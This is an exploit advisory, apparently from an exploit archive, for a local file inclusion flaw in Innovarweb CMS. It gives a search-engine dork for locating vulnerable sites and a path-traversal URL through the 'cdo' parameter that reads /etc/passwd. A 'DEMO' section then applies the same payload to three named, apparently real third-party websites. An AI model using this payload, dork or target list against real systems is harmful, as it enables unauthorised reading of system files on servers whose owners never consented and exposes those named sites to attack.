Innovarweb CMS Local File Inclusion Vulnerability

# Exploit Title: Innovarweb CMS / Local File Inclusion
# Date: 31/08/2012
# Author: Daniel Godoy
# Author Mail:DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php
# Tested on: Linux
# Dork: allinurl:"index.php?cdo="

 
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
www.remoteexecution.info www.remoteexcution.com.ar   
#RemoteExecution Hacking Group   




[PoC]

http://target/index.php?cdo=../../../../../../etc/passwd

[DEMO]
http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd
http://www.areneracolonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwd
http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd



#  0day.today [2018-02-18]  #